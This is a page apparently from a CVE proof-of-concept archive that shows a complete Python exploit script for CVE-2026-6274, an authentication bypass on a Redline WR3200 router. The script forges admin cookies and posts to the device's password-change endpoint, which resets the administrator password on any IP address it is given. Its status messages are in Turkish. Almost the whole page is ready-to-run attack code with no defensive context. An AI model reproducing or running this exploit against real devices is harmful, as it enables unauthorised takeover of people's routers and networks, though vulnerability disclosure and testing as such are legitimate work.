5585 Total CVEs
26 Years
GitHub
Home / 2026 / CVE-2026-6274
README.md
Rendering markdown...
POC / exploit.py PY
⬇ Raw GitHub ✕ Close 
import requests
import sys
import argparse

class Colors:
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
    BOLD = '\033[1m'

def banner():
    print(f"""
{Colors.BOLD}CVE-2026-6274 | Redline WR3200 Auth Bypass Exploit{Colors.ENDC}
{Colors.WARNING}--------------------------------------------------{Colors.ENDC}
    """)

class RedlineExploiter:
    def __init__(self, target_ip, new_password):
        self.target_ip = target_ip
        self.new_password = new_password
        self.url = f"http://{self.target_ip}/goform/set_manpwd"
        
        self.cookies = {
            "platform": "1",
            "user": "admin"
        }
        
        self.headers = {
            "X-Requested-With": "XMLHttpRequest",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "Referer": f"http://{self.target_ip}/admin/more.html",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
        }

    def run(self):
        data = {
            "type": "setmanpwd",
            "routepwd": self.new_password
        }

        print(f"[*] Hedef: {self.target_ip}")
        print(f"[*] İşlem: Şifre değiştirme deneniyor...")

        try:
            response = requests.post(
                self.url, 
                data=data, 
                cookies=self.cookies, 
                headers=self.headers, 
                timeout=10
            )

            if response.status_code == 200:
                print(f"{Colors.OKGREEN}[+] Başarılı!{Colors.ENDC} Şifre '{self.new_password}' olarak güncellendi.")
                print(f"[>] Sunucu Yanıtı: {response.text}")
            else:
                print(f"{Colors.FAIL}[-] Hata!{Colors.ENDC} Sunucu {response.status_code} koduyla yanıt verdi.")

        except requests.exceptions.ConnectionError:
            print(f"{Colors.FAIL}[!] Hata:{Colors.ENDC} Hedef cihaza bağlanılamadı. IP adresini kontrol edin.")
        except Exception as e:
            print(f"{Colors.FAIL}[!] Beklenmedik bir hata oluştu:{Colors.ENDC} {e}")

if __name__ == "__main__":
    banner()
    
    parser = argparse.ArgumentParser(description="Redline WR3200 Password Change Exploit")
    parser.add_argument("target", help="Hedef Modem IP Adresi (Örn: 192.168.1.1)")
    parser.add_argument("password", help="Atanacak Yeni Şifre")
    
    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)
        
    args = parser.parse_args()

    exploiter = RedlineExploiter(args.target, args.password)
    exploiter.run()